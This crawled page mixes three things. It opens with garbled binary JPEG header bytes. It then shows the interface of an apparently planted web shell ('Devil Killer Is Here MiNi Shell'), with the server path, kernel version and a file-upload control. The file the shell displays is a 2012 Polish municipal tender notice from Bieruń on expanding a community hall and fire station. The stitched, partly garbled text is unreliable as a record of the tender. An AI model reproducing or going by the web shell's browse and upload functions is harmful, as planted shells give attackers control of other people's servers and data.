JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/231301-N-2012.html

<p class="kh_header"><b>Bieruń: Utworzenie regionalnego centrum kulturalno - gospodarczego poprzez kompleksową
rozbudowę świetlicy środowiskowej i remizy OSP w Bieruniu przy ul. Remizowej - etap I
                                                            w tym:
Zadanie nr 1 pn.: Rozbudowa świetlicy środowiskowej przy ul. Remizowej,
Zadanie nr 2 pn.: Rozbudowa budynku remizy OSP w Bieruniu Nowym</b><br>
<b>Numer ogłoszenia: 231301 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie regionalnego centrum kulturalno - gospodarczego poprzez kompleksową
rozbudowę świetlicy środowiskowej i remizy OSP w Bieruniu przy ul. Remizowej - etap I
                                                            w tym:
Zadanie nr 1 pn.: Rozbudowa świetlicy środowiskowej przy ul. Remizowej,
Zadanie nr 2 pn.: Rozbudowa budynku remizy OSP w Bieruniu Nowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, sanitarne, elektryczne i drogowe związane 
z Utworzeniem regionalnego centrum kulturalno-gospodarczego poprzez kompleksową rozbudowę świetlicy środowiskowej i remizy OSP w Bieruniu przy ul. Remizowej - etap I,  w tym: 
Zadanie nr 1 pn.: Rozbudowa świetlicy środowiskowej przy ul. Remizowej,
Zadanie nr 2 pn.: Rozbudowa budynku remizy OSP w Bieruniu.

Budynek świetlicy środowiskowej i budynek remizy OSP znajdują się obok siebie ( przylegają do siebie ścianą boczną a ściany frontowe tworzą jedną linię zabudowy).
Zamawiający postanowił zlecić oba zadania jednemu Wykonawcy działającemu na jednym placu budowy.

Zadanie nr 1 obejmuje między innymi:
-	dobudowę sceny, zaplecza i sal warsztatowych do istniejącego budynku,
-	budowę amfiteatru wraz z nowoprojektowanym budynkiem sceny koncertowej,
-	budowę ogrodzenia,
-	budowę placu zabaw,
-	budowę utwardzonej drogi dojazdowej wraz z parkingami i oświetleniem terenu,
-	wycinkę drzew zgodnie z uzyskanym pozwoleniem. 
Kubatura rozbudowywanej części świetlicy środowiskowej - 2496,50 m3 .
Kubatura budynku sceny koncertowej - 265,17m 3  

Szczegółowy opis zadania nr 1 zawarty jest w następujących opracowaniach:
1.	Projekt budowlany rozbudowy
2.	Architektura 						Projekt Wykonawczy
3.	Konstrukcja 						Projekt Wykonawczy
4.	Wewnętrzna instalacja wod-kan 			Projekt Budowlano - Wykonawczy
5.	Instalacja wentylacji mechanicznej, klimatyzacji              Projekt Budowlano - Wykonawczy
i ogrzewania                                                                     
6.	Instalacje elektryczne wewnętrzne 			Projekt Budowlano - Wykonawczy 
7.	Instalacje elektryczne zewnętrzne			Projekt Budowlano - Wykonawczy 
8.	Drogi 							Projekt Budowlany
9.	Inwentaryzacja zieleni wraz z projektem zagospodarowania zieleni
10.	Ocena stanu technicznego
11.	Specyfikacja techniczna	Architektura i Konstrukcja
12.	Specyfikacja techniczna	Instalacja wod-kan
13.	Specyfikacja techniczna	Instalacja wentylacji mechanicznej, klimatyzacji ogrzewania
14.	Specyfikacja techniczna	Instalacje elektryczne wewnętrzne
15.	Specyfikacja techniczna	Instalacje elektryczne zewnętrzne
16.	Specyfikacja techniczna	Drogi
17.	Przedmiar robót		Architektura i Konstrukcja
18.	Przedmiar robót		Instalacje wod-kan
19.	Przedmiar robót		Instalacja wentylacji mechanicznej, klimatyzacji ogrzewania
20.	Przedmiar robót		Instalacje elektryczne wewnętrzne
21.	Przedmiar robót		Instalacje elektryczne zewnętrzne
22.	Przedmiar robót		Drogi
23.	Przedmiar robót		Inwentaryzacja zieleni wraz z projektem zagospodarowania zieleni

Zadanie nr 2 obejmuje między innymi:
- Rozbudowę garażu w budynku OSP wraz z budową węzłów szatniowych;
- Nadbudowę poddasza w celu przystosowania go do użytkowania;
- Wymianę istniejących drzwi garażowych;
- Wymianę posadzek;
- Odnowienie elewacji;
- Budowę drogi dojazdowej.
Kubatura rozbudowywanego budynku remizy OSP - 894,20 m3 .     
Kubatura istniejącego budynku remizy OSP - 825,97m3 .
Kubatura budynku remizy OSP - 1720,17m 3.

Szczegółowy opis zadania nr 2 zawarty jest w następujących opracowaniach: 
1.	Architektura, Konstrukcja 			Projekt Budowlany 
2.	Architektura					Projekt Wykonawczy
3.	Konstrukcja					Projekt Wykonawczy
4.	Instalacje elektryczne				Projekt Wykonawczy
5.	Instalacja wod-kan				Projekt Wykonawczy
6.	Instalacja wentylacji mechanicznej		Projekt Wykonawczy
7.	Instalacje centralnego ogrzewania		Projekt Wykonawczy 
8.	Ocena stanu technicznego obiektu w zakresie niezbędnym do wykonania projektu rozbudowy
9.	Specyfikacja techniczna	Architektura i Konstrukcja
10.	Specyfikacja techniczna	Instalacje elektryczne
11.	Specyfikacja techniczna	Instalacja wod-kan
12.	Specyfikacja techniczna	Instalacja wentylacji mechanicznej, 
13.	Specyfikacja techniczna	Instalacje centralnego ogrzewania
14.	Przedmiar robót	Architektura i Konstrukcja
15.	Przedmiar robót	Instalacje elektryczne 
16.	Przedmiar robót	Instalacje wod-kan
17.	Przedmiar robót	Instalacja wentylacji mechanicznej
19.Przedmiar robót	Instalacje centralnego ogrzewania
W wyniku realizacji zamówienia zamawiający ma uzyskać przedmiot w stanie kompletnym, gotowym  do użytkowania, o wysokiej jakości robót i wysokiej jakości zastosowanych materiałów.
Wykonawca, dodatkowo, w ramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny: 
-	zastosuje do realizacji przedmiotu zamówienia tylko fabrycznie nowe materiały, urządzenia oraz wyposażenie  przy przygotowaniu oferty i realizacji,
-	przeprowadzi wszelkie: próby, badania, odbiory urzędowe przewidziane przepisami,
-	przeprowadzi  lub opłaci przeprowadzenie wszelkich szkoleń, instruktaży dla pracowników obsługi zamawiającego, 
-	opracuje projekt organizacji robót z planem BIOZ i przedstawi go Zamawiającemu do uzgodnienia,
-	przekaże: projekt powykonawczy (część opisowa, część rysunkowa),  wszelkie atesty na materiały 
i urządzenia (2 egzemplarze w wersji papierowej oraz wersja elektroniczna edytowalna oraz 
w plikach Adobe Reader),
-	przekaże dokumentację fotograficzną z przebiegu robót - wersja elektroniczna,
-	zorganizuje własne zaplecze na potrzeby budowy w miejscu uzgodnionym z Zamawiającym,
-	pokryje koszty zużycia wody, energii elektrycznej, cieplnej na postawie zamontowanych na swój koszt urządzeń pomiarowych,
-	pokryje koszty rozruchu technologicznego,
-	wykona pomiary geodezyjne dla realizacji robót oraz powykonawcze pomiary geodezyjne 
z naniesieniem wyników pomiarów do miejskich zasobów geodezyjnych, z podaniem numeru KERG oraz dostarczeniem zaktualizowanej mapy zasadniczej w skali 1:500.
Jeżeli w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz SIWZ
określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. 
Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego lub wyższego poziomu jakościowego, technologicznego i estetycznego, określonych w SIWZ i STWOiR.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem
budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty,
certyfikaty i aprobaty techniczne. 
Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania
zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów
w rozumieniu ustawy oraz stosowania wymagań określonych w art.29 ust.4 ustawy.
Zamawiający nie dopuszcza składania ofert częściowych , wariantowych.
Odpowiedzialność Wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu umowy wynosi 36 miesięcy licząc  od daty odbioru przedmiotu umowy.
Na zastosowane przy realizacji przedmiotu umowy urządzenia Wykonawca udzieli gwarancji na okres, na jaki udzielona została gwarancja producenta tychże urządzeń, przy czym okres gwarancji i rękojmi na zastosowane zamontowane urządzenia nie może być krótszy niż 18 miesięcy od daty odbioru końcowego obiektu przez Zamawiającego.
Projekt dofinansowany ze środków dotacji celowej budżetu państwa.

Nazwy i kody według słownika CPV:
 kod CPV: 45.00.00.00-7 - nazwa: Roboty budowlane
dodatkowe kody: 
kod CPV :45.21.23.00-9  Roboty budowlane w zakresie budowy artystycznych i kulturalnych obiektów 
                                         budowlanych
kod CPV: 45.21.61.21-8  Roboty budowlane w zakresie obiektów straży pożarnej
kod CPV: 45.26.24.20-1  Wznoszenie konstrukcji obiektów
kod CPV: 45.21.00.00-2  Roboty budowlane w zakresie budynków
kod CPV: 45.40.00.00-1  Roboty wykończeniowe w zakresie obiektów budowlanych
kod CPV: 45.31.00.00-3  Roboty instalacyjne elektryczne
kod CPV: 45.31.61.00-6  Instalowanie urządzeń oświetlenia zewnętrznego
kod CPV: 45.31.10.00-0  Roboty w zakresie okablowania oraz instalacji elektrycznych
kod CPV: 45.11.12.00-0  Roboty ziemne
kod CPV: 45.33.00.00-9  Roboty instalacyjne wodno-kanalizacyjne i sanitarne
kod CPV: 45.33.11.00-7  Instalowanie centralnego ogrzewania
kod CPV: 45.33.12.00-8  Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych
kod CPV: 45.45.30.00-7  Roboty remontowe i renowacyjne
kod CPV: 45.44.30.00-4  Roboty elewacyjne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.23.00-9, 45.21.61.21-8, 45.26.24.20-1, 45.21.00.00-2, 45.40.00.00-1, 45.31.00.00-3, 45.31.61.00-6, 45.31.10.00-0, 45.11.12.00-0, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.00-8, 45.45.30.00-7, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości  80 000,00 zł ( słownie: osiemdziesiąttysięcyzłotych 00/100) musi być wniesione w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.64.2012 Przetarg nieograniczony na wybór wykonawcy zamówienia  Utworzenie regionalnego centrum kulturalno - gospodarczego poprzez kompleksową
rozbudowę świetlicy środowiskowej i remizy OSP w Bieruniu przy ul. Remizowej -  etap I, w tym:
Zadanie nr 1 pn. Rozbudowa świetlicy środowiskowej przy ul. Remizowej
Zadanie nr 2 pn. Rozbudowa budynku remizy OSP w Bieruniu Nowym.
Określenie - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium ,wpłaconego przelewem, na rachunku zamawiającego.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed      
     upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - to w tym 
     okresie roboty budowlane, które obejmowały budowę, przebudowę, rozbudowę lub  remont obiektów 
     kubaturowych  o łącznej wartości brutto min. 3 000 000,00 zł, w tym jednego obiektu kubaturowego
     o wartości brutto min.2 000 000,00 zł.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
     - wykazu wykonanych robót budowlanych , które obejmowały budowę, przebudowę, rozbudowę lub remont obiektów kubaturowych o łącznej  wartości brutto min. 3 000 000,00 zł, w tym jednego obiektu kubaturowego o wartości brutto min.2 000 000,00 zł z podaniem  ich rodzaju i wartości, daty  i miejsca  wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie  z  zasadami sztuki budowlanej i prawidłowo ukończone (np.referencji, protokołów końcowych odbioru robót).
Przez wykonali należy rozumieć, że roboty  zostały zakończone i odebrane protokołami 	 końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,
a jeżeli okres jest krótszy - w tym okresie. 
Warunek wykonania robót jest spełniony również w przypadku wykazania, że wykonawca wybudował, rozbudował, przebudował lub wyremontował  jeden obiekt kubaturowy o wartości min. 3 000 000,00 zł brutto.
    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełnienia 
warunku nastąpi łącznie tzn. należy wykazać, że przynajmniej jeden z wykonawców wybudował, rozbudował, przebudował lub wyremontował  jeden obiekt kubaturowy o wartości min. 2 000 000,00 zł brutto, a łącznie (wykonawcy wspólnie ubiegający się o udzielenie zamówienia)  wykonali  wymagane obiekty kubaturowe o wartości brutto co najmniej 3 000 000,00 zł lub jeden z nich wybudował, przebudował, rozbudował lub wyremontował obiekt kubaturowy o wartości co najmniej 3 000 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego  przez wykonawcę:
   - oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami     
ogólnobudowlanymi bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
     przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności                                             odpowiedzialnych za  kierowanie robotami budowlanymi (uprawnienia budowlane bez ograniczeń), wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
     W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, 
      że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
         przedłożonego przez wykonawcę :
    oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
    że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

